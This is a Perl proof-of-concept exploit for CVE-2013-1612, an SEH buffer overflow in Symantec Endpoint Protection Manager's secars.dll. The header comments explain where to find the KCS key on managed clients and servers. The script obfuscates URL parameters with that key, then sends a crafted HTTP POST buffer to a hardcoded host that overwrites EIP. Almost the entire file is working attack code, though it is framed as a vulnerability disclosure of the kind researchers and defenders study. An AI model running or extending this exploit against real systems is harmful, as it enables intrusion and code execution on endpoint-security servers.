#!/usr/bin/perl -w
#=====================================================================================
# SEP Manager 12.1.2015.2015 - SEH Overflow POC
# Vulnerability found in secars.dll, HEX parser function
#=====================================================================================
#
# Author: Jerome Nokin - http://funoverip.net
# Discovery date: 31 January 2013
# CVE: CVE-2013-1612
# Tested on: Windows 2003 Enterprise Edition SP2
# This POC code overwrite EIP with "CCCCCCCC"
#
#=====================================================================================
#
# About KCS Key: That key is used to obfuscate traffic between client and server.
#                The key is generated during SEPM installation.
#                We need that key to talk with the SEPM server..
#
# Where to find KCS Key ?
# On a managed client station. Search for "Kcs" inside:
#
# - Win7/Vista/W2k8/and more :
#    C:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\CurrentVersion\\Data\\Config\\SyLink.xml
# - Windows XP :
#    C:\\Document & Settings\\All Users\\Application Data\\Symantec\\Symantec Endpoint Protection\\
#    CurrentVersion\\Data\\Config\\SyLink.xml
#
# On server side, check the logs:
#    C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\data\\inbox\\log\\ersecreg.log
#=====================================================================================

use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;

# SEP Manager host/ip
my $host        = "192.168.6.18";
my $port = 8014;

# Kcs key
my $Kcs_hex     = "85FB05B288B45D92447A3EDCBEFC434E";

# ---- config end -----

# flush after every write
$| = 1;

# Send HTTP request function
sub send_request {
        my $param = shift;      # URL parameters
        my $post_data = shift;  # POST DATA
        my $sock = IO::Socket::INET->new("$host:$port");
        if($sock){
                print "Connected.. \n";

                # HTTP request
                my $req =
                        "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
                        "User-Agent: Smc\r\n" .
                        "Host: $host\r\n" .
                        "Content-Length: " . length($post_data) . "\r\n" .
                        "\r\n" .
                        $post_data ;

                # Sending
                print $sock $req;

                # Read HTTP response
                my $resp = '';
                while(<$sock>){ $resp .=$_; }

                #print $resp;  
         if($resp =~ /400 Bad Request/) {
                 print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
                      
  }
 
  close $sock;
 }

}

# SEP object
my $sep = SEPM::SEPM->new();

print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";

# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);

# Obfuscate URL parameters
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");

# The evil buff
print "[*] Building evil buffer\n";
my $buf =
         "foo=[hex]" .   # [hex] call the vulnerable parsing function
  "F" x 1288 .    # Junk
  "B" x 8 .       # Pointer to next SEH record
  "CCCCCCCC".     # SEH Handler, will overwrite EIP register 
  "D" x 500;      # Trigger "Memory Access Violation" exception

# Sending request
print "[*] Sending HTTP request\n";
send_request($h,     # URL parameters
             $buf    # post data       
);

print "[*] Done\n";